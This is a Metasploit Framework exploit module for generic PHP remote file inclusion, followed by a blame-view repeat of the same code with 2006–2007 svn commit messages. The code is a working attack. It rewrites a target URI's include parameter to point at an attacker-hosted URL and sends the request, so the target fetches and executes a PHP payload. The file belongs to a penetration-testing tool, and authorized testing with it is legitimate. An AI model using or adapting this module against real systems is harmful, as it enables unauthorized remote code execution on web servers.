metasploit-framework/modules/exploits/unix/webapp/php_include.rb

require 'msf/core'

module Msf

class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote

	include Exploit::Remote::Tcp
	include Exploit::Remote::HttpServer::PHPInclude

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PHP Include Generic Exploit',
			'Description'    => %q{
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 3509 $',
			'References'     =>
				[

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 32768,
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),
				], self.class)
	end

	
	def php_exploit
		connect
		req = "GET #{datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))} HTTP/1.0\r\n\r\n"
		print_status("Sending: #{req}")
		sock.put(req)
		disconnect
	end
	
end
end
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`require 'msf/core'`

			`module Msf`

Updates git-svn-id: file:///home/svn/framework3/trunk@4255 4d416f70-5f16-0410-b530-b9f4589650da 2007-01-05 03:47:44 +00:00			`class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00
			`include Exploit::Remote::Tcp`
			`include Exploit::Remote::HttpServer::PHPInclude`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PHP Include Generic Exploit',`
			`'Description' => %q{`
			`},`
			`'Author' => [ 'hdm' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 3509 $',`
			`'References' =>`
			`[`

			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Space' => 32768,`
			`},`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`
Slight cleanups -- still not ready for real use git-svn-id: file:///home/svn/framework3/trunk@4216 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:02:35 +00:00
			`register_options(`
			`[`
			`OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/test.php?path=!URL!"]),`
			`], self.class)`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`end`


			`def php_exploit`
			`connect`
Slight cleanups -- still not ready for real use git-svn-id: file:///home/svn/framework3/trunk@4216 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 08:02:35 +00:00			`req = "GET #{datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))} HTTP/1.0\r\n\r\n"`
Initial support for PHP payloads git-svn-id: file:///home/svn/framework3/trunk@4215 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-17 07:57:51 +00:00			`print_status("Sending: #{req}")`
			`sock.put(req)`
			`disconnect`
			`end`

			`end`
			`end`